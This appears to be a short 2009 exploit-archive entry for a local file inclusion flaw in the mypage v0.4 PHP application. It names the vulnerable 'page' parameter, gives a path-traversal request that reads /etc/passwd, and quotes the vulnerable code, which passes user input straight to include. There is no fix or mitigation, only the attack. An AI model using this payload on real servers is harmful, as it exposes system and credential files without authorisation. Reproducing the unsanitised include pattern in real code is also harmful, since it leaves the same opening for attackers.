[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : mypage v0.4 Local File Inclusion Vulnerability
# Published : 2009-12-22
# Author : BAYBORA
# Previous Title : The Uploader 2.0 File Disclosure Vulnerability
# Next Title : Mini File Host v1.5 Remote File Upload Vulnerability
#############################################################
# mypage0.4 LFI Vulnerability
# Author: BAYBORA
# Site: www.1923turk.biz<http://www.1923turk.biz>
##############################################################
# Exploit:
Vuln file: index.php?page=LFI
Exploit:
POST http://server/index.php?page=../../../../../../../../etc/passwd
index.php
if(isset($_GET['page'])){
...
$inhalt=$inhaltsordner."/".$_GET['page'];}
...
$inhalt=str_replace("///","",$inhalt);
if (FALSE==include$inhalt){echo$notfound;}